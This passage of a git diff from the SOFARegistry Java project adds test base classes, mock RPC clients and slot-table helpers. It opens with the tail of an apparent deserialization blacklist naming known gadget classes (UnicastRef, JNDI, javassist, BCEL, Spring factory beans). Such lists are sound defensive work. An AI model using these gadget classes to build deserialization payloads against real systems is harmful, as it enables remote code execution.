+org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder +org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor +org.springframework.beans.factory.BeanFactory +org.springframework.beans.factory.config.PropertyPathFactoryBean +org.springframework.beans.factory.support.DefaultListableBeanFactory +org.springframework.jndi.support.SimpleJndiBeanFactory +org.springframework.orm.jpa.AbstractEntityManagerFactoryBean +org.springframework.transaction.jta.JtaTransactionManager +org.yaml.snakeyaml.tokens.DirectiveToken +sun.rmi.server.UnicastRef +javax.management.ImmutableDescriptor +org.springframework.jndi.JndiObjectTargetSource +ch.qos.logback.core.db.JNDIConnectionSource +java.beans.Expression +javassist.bytecode +javassist.tools.web.Viewer +javassist.util.proxy.SerializedProxy +org.apache.ibatis.javassist.bytecode +org.apache.ibatis.javassist.tools.web.Viewer +org.apache.ibatis.javassist.util.proxy.SerializedProxy +org.springframework.beans.factory.config.MethodInvokingFactoryBean +com.alibaba.druid +com.sun.corba +com.sun.org.apache.bcel +com.sun.org.apache.xml +com.sun.org.apache.xpath +org.apache.zookeeper.Shell +org.apache.tomcat.dbcp.dbcp.BasicDataSource +net.bytebuddy.dynamic.loading.ByteArrayClassLoader +org.jboss.resteasy.plugins +org.springframework.beans.BeanWrapperImpl$BeanPropertyHandler +org.apache.velocity.runtime.resource.Resource +org.springframework.expression.spel.ast.Indexer$PropertyIndexingValueRef +org.mortbay.log.Slf4jLog +org.springframework.expression.spel.ast.MethodReference$MethodValueRef \ No newline at end of file diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AbstractSessionServerTestBase.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AbstractSessionServerTestBase.java new file mode 100644 index 000000000..f0f4e71ec --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AbstractSessionServerTestBase.java @@ -0,0 +1,578 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session; + +import com.alipay.sofa.registry.common.model.ElementType; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.PublishType; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.*; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Client; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.alipay.sofa.registry.util.JsonUtils; +import com.alipay.sofa.registry.util.ObjectFactory; +import com.google.common.collect.Maps; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.*; +import java.util.concurrent.ScheduledExecutorService; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.TimeoutException; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Rule; +import org.junit.rules.TestName; + +/** + * @author chen.zhu + *

Nov 18, 2020 + */ +public class AbstractSessionServerTestBase extends AbstractTestBase { + + @Rule public TestName name = new TestName(); + + protected SessionServerConfig sessionServerConfig = TestUtils.newSessionConfig(getDc()); + + @Before + public void beforeAbstractMetaServerTest() {} + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static URL randomURL() { + return randomURL("127.0.0.1"); + } + + public static URL randomURL(String ip) { + return new URL(ip, randomPort()); + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static Client getRpcClient( + ScheduledExecutorService scheduled, int responseDelayMilli, Object responseObj) { + return new MockRpcClient() + .setScheduled(scheduled) + .setResponseDelayMilli(responseDelayMilli) + .setResponseObj(responseObj); + } + + public static Client getRpcClient( + ScheduledExecutorService scheduled, int responseDelayMilli, Throwable th) { + return new MockRpcClient() + .setScheduled(scheduled) + .setResponseDelayMilli(responseDelayMilli) + .setPositive(false) + .setThrowable(th); + } + + public static Client getRpcClient(Object response, int responseDelayMilli) { + return new MockRpcClient().setResponseObj(response).setResponseDelayMilli(responseDelayMilli); + } + + public void printSlotTable(SlotTable slotTable) { + try { + logger.warn( + "{}", + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotTable)); + } catch (Exception ignore) { + } + } + + protected void assertSlotTableNoDupLeaderFollower(SlotTable slotTable) { + slotTable + .getSlotMap() + .forEach( + (slotId, slot) -> { + Assert.assertFalse(slot.getFollowers().contains(slot.getLeader())); + }); + } + + private void counterIncr(Map counter, String ip) { + Integer prev = counter.get(ip); + counter.put(ip, prev == null ? 1 : prev + 1); + } + + public static class MockRpcClient implements Client { + + private ObjectFactory response; + + private int responseDelayMilli; + + private ScheduledExecutorService scheduled; + + private Channel channel; + + private boolean isPositive = true; + + private Throwable throwable; + + @Override + public Channel getChannel(URL url) { + return null; + } + + @Override + public Channel connect(URL url) { + return null; + } + + @Override + public Object sendSync(URL url, Object message, int timeoutMillis) { + try { + Thread.sleep(responseDelayMilli); + throwIfNegative(); + } catch (Throwable e) { + throw new SofaRegistryRuntimeException(e); + } + return response.create(); + } + + @Override + public Object sendSync(Channel channel, Object message, int timeoutMillis) { + try { + Thread.sleep(responseDelayMilli); + throwIfNegative(); + } catch (Throwable e) { + throw new SofaRegistryRuntimeException(e); + } + return response.create(); + } + + @Override + public void sendCallback( + URL url, Object message, CallbackHandler callbackHandler, int timeoutMillis) { + if (isPositive) { + scheduled.schedule( + () -> callbackHandler.onCallback(channel, response.create()), + responseDelayMilli, + TimeUnit.MILLISECONDS); + } else { + scheduled.schedule( + () -> callbackHandler.onException(channel, throwable), + responseDelayMilli, + TimeUnit.MILLISECONDS); + } + } + + @Override + public InetSocketAddress getLocalAddress() { + return null; + } + + @Override + public void close() {} + + @Override + public boolean isClosed() { + return false; + } + + private void throwIfNegative() throws Throwable { + if (!isPositive) { + if (throwable != null) { + throw throwable; + } else { + throw new SofaRegistryRuntimeException("expected exception"); + } + } + } + + public MockRpcClient setResponse(ObjectFactory response) { + this.response = response; + return this; + } + + public MockRpcClient setResponseObj(Object responseObj) { + this.response = + new ObjectFactory() { + @Override + public Object create() { + return responseObj; + } + }; + return this; + } + + public MockRpcClient setResponseDelayMilli(int responseDelayMilli) { + this.responseDelayMilli = responseDelayMilli; + return this; + } + + public MockRpcClient setScheduled(ScheduledExecutorService scheduled) { + this.scheduled = scheduled; + return this; + } + + public MockRpcClient setChannel(Channel channel) { + this.channel = channel; + return this; + } + + public MockRpcClient setPositive(boolean positive) { + isPositive = positive; + return this; + } + + public MockRpcClient setThrowable(Throwable throwable) { + this.throwable = throwable; + return this; + } + } + + protected static List randomDataNodes(int num) { + List result = Lists.newArrayList(); + for (int i = 0; i < num; i++) { + result.add(new DataNode(randomURL(randomIp()), getDc())); + } + return result; + } + + public static SlotTable randomSlotTable() { + return new SlotTableGenerator(randomDataNodes(3)).createSlotTable(); + } + + public static SlotTable randomSlotTable(List dataNodes) { + return randomSlotTable(dataNodes, SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS); + } + + public static SlotTable randomSlotTable(List dataNodes, int slotNum, int slotReplicas) { + return new SlotTableGenerator(dataNodes).createSlotTable(slotNum, slotReplicas); + } + + protected SlotTable randomUnBalancedSlotTable(List dataNodes) { + return new SlotTableGenerator(dataNodes).createLeaderUnBalancedSlotTable(); + } + + protected boolean isMoreBalanced(SlotTable before, SlotTable current, List dataNodes) { + // Map beforeLeaderCount = + // SlotTableUtils.getSlotTableLeaderCount(before); + // Map currentLeaderCount = + // SlotTableUtils.getSlotTableLeaderCount(current); + // + // Map beforeSlotsCount = SlotTableUtils.getSlotTableSlotCount(before); + // Map currentSlotsCount = + // SlotTableUtils.getSlotTableSlotCount(current); + + int maxLeaderGapBefore = maxLeaderGap(before, dataNodes); + int maxLeaderGapCurrent = maxLeaderGap(current, dataNodes); + int maxSlotsGapBefore = maxSlotGap(before, dataNodes); + int maxSlotsGapCurrent = maxSlotGap(current, dataNodes); + logger.info("[before leader gap] {}", maxLeaderGapBefore); + logger.info("[current leader gap] {}", maxLeaderGapCurrent); + logger.info("[before slots gap] {}", maxSlotsGapBefore); + logger.info("[current slots gap] {}", maxSlotsGapCurrent); + return maxLeaderGapBefore > maxLeaderGapCurrent || maxSlotsGapBefore > maxSlotsGapCurrent; + } + + public static int maxLeaderGap(SlotTable slotTable, List dataNodes) { + Map counter = new HashMap<>(dataNodes.size()); + dataNodes.forEach(dataNode -> counter.put(dataNode.getIp(), 0)); + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + int count = counter.get(entry.getValue().getLeader()); + counter.put(entry.getValue().getLeader(), count + 1); + } + return maxGap(counter); + } + + public static int maxSlotGap(SlotTable slotTable, List dataNodes) { + Map counter = new HashMap<>(dataNodes.size()); + dataNodes.forEach(dataNode -> counter.put(dataNode.getIp(), 0)); + for (Map.Entry entry : slotTable.getSlotMap().entrySet()) { + int count = counter.get(entry.getValue().getLeader()); + counter.put(entry.getValue().getLeader(), count + 1); + for (String dataServer : entry.getValue().getFollowers()) { + count = counter.get(dataServer); + counter.put(dataServer, count + 1); + } + } + return maxGap(counter); + } + + public static int maxGap(Map stats) { + int min = Integer.MAX_VALUE, max = Integer.MIN_VALUE; + for (int count : stats.values()) { + min = Math.min(count, min); + max = Math.max(count, max); + } + return max - min; + } + + public static class SlotTableGenerator { + + private final List dataNodes; + + public SlotTableGenerator(List dataNodes) { + this.dataNodes = dataNodes; + } + + public SlotTable createSlotTable(int slotNum, int slotReplicas) { + long epoch = DatumVersionUtil.nextId(); + Map slotMap = generateSlotMap(slotNum, slotReplicas); + return new SlotTable(epoch, slotMap.values()); + } + + public SlotTable createSlotTable() { + return createSlotTable(SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS); + } + + public SlotTable createLeaderUnBalancedSlotTable() { + long epoch = DatumVersionUtil.nextId(); + Map slotMap = generateUnBalancedSlotMap(); + return new SlotTable(epoch, slotMap.values()); + } + + private Map generateSlotMap(int slotNum, int slotReplicas) { + Map slotMap = Maps.newHashMap(); + for (int i = 0; i < slotNum; i++) { + long epoch = DatumVersionUtil.nextId(); + String leader = getNextLeader().getIp(); + List followers = Lists.newArrayList(); + for (int j = 0; j < slotReplicas - 1; j++) { + followers.add(getNextFollower().getIp()); + } + Slot slot = new Slot(i, leader, epoch, followers); + slotMap.put(i, slot); + } + return slotMap; + } + + private Map generateUnBalancedSlotMap() { + Map slotMap = Maps.newHashMap(); + int leaderIndex = Math.abs(random.nextInt()) % dataNodes.size(); + String leader = dataNodes.get(leaderIndex).getIp(); + for (int i = 0; i < SlotConfig.SLOT_NUM; i++) { + long epoch = DatumVersionUtil.nextId(); + List followers = Lists.newArrayList(); + for (int j = 0; j < SlotConfig.SLOT_REPLICAS - 1; j++) { + DataNode follower = getNextFollower(); + while (follower.getIp().equalsIgnoreCase(leader) || followers.contains(follower)) { + follower = getNextUnbalancedFollower(); + } + followers.add(follower.getIp()); + } + Slot slot = new Slot(i, leader, epoch, followers); + slotMap.put(i, slot); + } + return slotMap; + } + + private AtomicInteger nextLeader = new AtomicInteger(); + + private AtomicInteger nextFollower = new AtomicInteger(1); + + private DataNode getNextLeader() { + return dataNodes.get(nextLeader.getAndIncrement() % dataNodes.size()); + } + + private DataNode getNextFollower() { + return dataNodes.get(nextFollower.getAndIncrement() % dataNodes.size()); + } + + private DataNode getNextUnbalancedFollower() { + return dataNodes.get(nextFollower.getAndIncrement() % dataNodes.size()); + } + + public SlotTableGenerator setNextLeader(int nextLeader) { + this.nextLeader.set(nextLeader); + return this; + } + + public SlotTableGenerator setNextFollower(int nextFollower) { + this.nextFollower.set(nextFollower); + return this; + } + } + + public static int randomInt() { + return random.nextInt(); + } + + public static int randomInt(int bound) { + return random.nextInt(bound); + } + + public Watcher randomWatcher() { + Watcher watcher = new Watcher(); + initBaseInfo(watcher); + return watcher; + } + + public Publisher randomPublisher() { + Publisher publisher = new Publisher(); + initBaseInfo(publisher); + publisher.setPublishType(PublishType.NORMAL); + publisher.setSessionProcessId( + new ProcessId(randomIp(), System.currentTimeMillis(), randomInt(1024), randomInt())); + return publisher; + } + + public Subscriber randomSubscriber() { + Subscriber subscriber = new Subscriber(); + initBaseInfo(subscriber); + subscriber.setScope(ScopeEnum.dataCenter); + subscriber.setElementType(ElementType.SUBSCRIBER); + return subscriber; + } + + public Subscriber randomSubscriber(String dataInfo, String instanceId) { + Subscriber subscriber = randomSubscriber(); + subscriber.setDataId(dataInfo); + subscriber.setInstanceId(instanceId); + subscriber.setDataInfoId( + DataInfo.toDataInfoId( + subscriber.getDataId(), subscriber.getInstanceId(), subscriber.getGroup())); + return subscriber; + } + + public void initBaseInfo(BaseInfo baseInfo) { + baseInfo.setAppName("app-" + randomInt(1024)); + baseInfo.setGroup("default-group"); + baseInfo.setClientRegisterTimestamp(System.currentTimeMillis()); + baseInfo.setClientVersion(BaseInfo.ClientVersion.StoreData); + baseInfo.setDataId(randomString(20)); + baseInfo.setInstanceId(randomString(10)); + baseInfo.setRegisterId(randomIp()); + baseInfo.setProcessId(randomInt(1024) + ""); + baseInfo.setDataInfoId( + DataInfo.toDataInfoId(baseInfo.getDataId(), baseInfo.getInstanceId(), baseInfo.getGroup())); + } + + public static class SimpleNode implements Node { + + private String ip; + + public SimpleNode(String ip) { + this.ip = ip; + } + + @Override + public NodeType getNodeType() { + return NodeType.DATA; + } + + @Override + public URL getNodeUrl() { + return new URL(ip); + } + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AbstractTestBase.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AbstractTestBase.java new file mode 100644 index 000000000..b1b82e507 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AbstractTestBase.java @@ -0,0 +1,407 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session; + +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import io.netty.util.ResourceLeakDetector; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.Collections; +import java.util.Map; +import java.util.Random; +import java.util.Set; +import java.util.concurrent.*; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; +import org.junit.After; +import org.junit.Before; +import org.junit.BeforeClass; +import org.junit.Rule; +import org.junit.rules.TestName; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class AbstractTestBase { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + protected ExecutorService executors; + + protected ScheduledExecutorService scheduled; + + @Rule public TestName name = new TestName(); + + public static final Random random = new Random(); + + @BeforeClass + public static void beforeAbstractTestClass() { + System.setProperty("spring.main.show_banner", "false"); + System.setProperty("spring.profiles.active", "test"); + System.setProperty(SlotConfig.KEY_DATA_SLOT_NUM, "16"); + } + + @Before + public void beforeAbstractTest() throws Exception { + + ResourceLeakDetector.setLevel(ResourceLeakDetector.Level.PARANOID); + Thread.interrupted(); // clear interrupt + + executors = Executors.newCachedThreadPool(new NamedThreadFactory(name.getMethodName())); + scheduled = + Executors.newScheduledThreadPool( + Runtime.getRuntime().availableProcessors(), + new NamedThreadFactory("sched-" + name.getMethodName())); + if (logger.isInfoEnabled()) { + logger.info(remarkableMessage("[begin test][{}]"), name.getMethodName()); + } + } + + @After + public void afterAbstractTest() + throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException { + executors.shutdownNow(); + scheduled.shutdownNow(); + + logger.info(remarkableMessage("[end test][{}]"), name.getMethodName()); + } + + protected static void setEnv(Map newenv) throws Exception { + try { + Class processEnvironmentClass = Class.forName("java.lang.ProcessEnvironment"); + Field theEnvironmentField = processEnvironmentClass.getDeclaredField("theEnvironment"); + theEnvironmentField.setAccessible(true); + Map env = (Map) theEnvironmentField.get(null); + env.putAll(newenv); + Field theCaseInsensitiveEnvironmentField = + processEnvironmentClass.getDeclaredField("theCaseInsensitiveEnvironment"); + theCaseInsensitiveEnvironmentField.setAccessible(true); + Map cienv = + (Map) theCaseInsensitiveEnvironmentField.get(null); + cienv.putAll(newenv); + } catch (NoSuchFieldException e) { + Class[] classes = Collections.class.getDeclaredClasses(); + Map env = System.getenv(); + for (Class cl : classes) { + if ("java.util.Collections$UnmodifiableMap".equals(cl.getName())) { + Field field = cl.getDeclaredField("m"); + field.setAccessible(true); + Object obj = field.get(env); + Map map = (Map) obj; + map.clear(); + map.putAll(newenv); + } + } + } + } + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + protected String remarkableMessage(String msg) { + return String.format("--------------------------%s--------------------------\r\n", msg); + } + + protected void waitForAnyKeyToExit() throws IOException { + logger.info("type any key to exit.................."); + waitForAnyKey(); + } + + protected void waitForAnyKey() throws IOException { + System.in.read(); + } + + protected void waitConditionUntilTimeOut(BooleanSupplier booleanSupplier) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, 5000, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static class NotifyObserversCounter implements UnblockingObserver { + + private final AtomicInteger counter = new AtomicInteger(0); + + @Override + public void update(Observable source, Object message) { + counter.getAndIncrement(); + } + + public int getCounter() { + return counter.get(); + } + } + + public static class ConcurrentExecutor implements Executor { + + private final int tasks; + + protected final CyclicBarrier barrier; + + protected final CountDownLatch latch; + + protected final ExecutorService executors; + + public ConcurrentExecutor(int tasks, ExecutorService executors) { + this.tasks = tasks; + this.barrier = new CyclicBarrier(tasks); + this.latch = new CountDownLatch(tasks); + this.executors = executors; + } + + @Override + public void execute(final Runnable command) { + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + command.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + try { + latch.await(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + } + + public static class ConsumerProducer extends ConcurrentExecutor { + + protected final Runnable consumer; + + protected final Runnable producer; + + protected final int consumerNum; + + protected final int producerNum; + + private ConsumerProducer( + int tasks, + ExecutorService executors, + Runnable consumer, + Runnable producer, + int consumerNum, + int producerNum) { + super(tasks, executors); + this.consumer = consumer; + this.producer = producer; + this.consumerNum = consumerNum; + this.producerNum = producerNum; + } + + public static Builder builder() { + return new Builder(); + } + + @Override + public void execute(Runnable command) { + if (command != null) { + command.run(); + } + for (int i = 0; i < consumerNum; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + consumer.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + for (int i = 0; i < producerNum; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + producer.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + try { + latch.await(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + + public static class Builder { + protected Runnable consumer; + + protected Runnable producer; + + protected int consumerNum; + + protected int producerNum; + + protected ExecutorService executorService; + + public Builder consumer(Runnable consumer) { + this.consumer = consumer; + return this; + } + + public Builder producer(Runnable producer) { + this.producer = producer; + return this; + } + + public Builder consumerNum(int consumerNum) { + this.consumerNum = consumerNum; + return this; + } + + public Builder producerNum(int producerNum) { + this.producerNum = producerNum; + return this; + } + + public Builder executor(ExecutorService executorService) { + this.executorService = executorService; + return this; + } + + public ConsumerProducer build() { + return new ConsumerProducer( + producerNum + consumerNum, + executorService, + consumer, + producer, + consumerNum, + producerNum); + } + } + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AllTests.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AllTests.java new file mode 100644 index 000000000..3592bc59d --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/AllTests.java @@ -0,0 +1,40 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session; + +/** + * @author chen.zhu + *

Apr 12, 2021 + */ +import com.alipay.sofa.registry.server.session.listener.ProvideDataChangeFetchTaskListenerTest; +import com.alipay.sofa.registry.server.session.node.service.MetaServerServiceImplTest; +import com.alipay.sofa.registry.server.session.node.service.SessionMetaServerManagerTest; +import com.alipay.sofa.registry.server.session.slot.SlotTableCacheImplTest; +import com.alipay.sofa.registry.server.session.store.DataCacheTest; +import org.junit.runner.RunWith; +import org.junit.runners.Suite; + +@RunWith(Suite.class) +@Suite.SuiteClasses({ + WrapperInvocationTest.class, + DataCacheTest.class, + SlotTableCacheImplTest.class, + MetaServerServiceImplTest.class, + SessionMetaServerManagerTest.class, + ProvideDataChangeFetchTaskListenerTest.class +}) +public class AllTests {} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/DatumUtilsTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/DatumUtilsTest.java deleted file mode 100644 index 68e326fd3..000000000 --- a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/DatumUtilsTest.java +++ /dev/null @@ -1,54 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session; - -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.server.session.utils.DatumUtils; -import org.junit.Assert; -import org.junit.Test; - -/** - @author xuanbei - @since 2019/2/12 - */ -public class DatumUtilsTest { - @Test - public void testNewDatumIfNull() { - Datum datum = new Datum(); - datum.setVersion(19092L); - datum.setDataId("test-dataId"); - datum.setDataCenter("test-dataCenter"); - - Subscriber subscriber = new Subscriber(); - subscriber.setDataId("subscriber-dataId"); - subscriber.setGroup("DEFAULT_GROUP"); - - datum = DatumUtils.newDatumIfNull(datum, subscriber); - Assert.assertEquals(19092L, datum.getVersion()); - Assert.assertEquals("test-dataId", datum.getDataId()); - Assert.assertEquals("test-dataCenter", datum.getDataCenter()); - Assert.assertEquals(null, datum.getGroup()); - - datum = DatumUtils.newDatumIfNull(null, subscriber); - Assert.assertEquals(ValueConstants.DEFAULT_NO_DATUM_VERSION, datum.getVersion()); - Assert.assertEquals("subscriber-dataId", datum.getDataId()); - Assert.assertEquals(ValueConstants.DEFAULT_DATA_CENTER, datum.getDataCenter()); - Assert.assertEquals("DEFAULT_GROUP", datum.getGroup()); - } -} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/TestUtils.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/TestUtils.java new file mode 100644 index 000000000..0ebdd53e2 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/TestUtils.java @@ -0,0 +1,311 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session; + 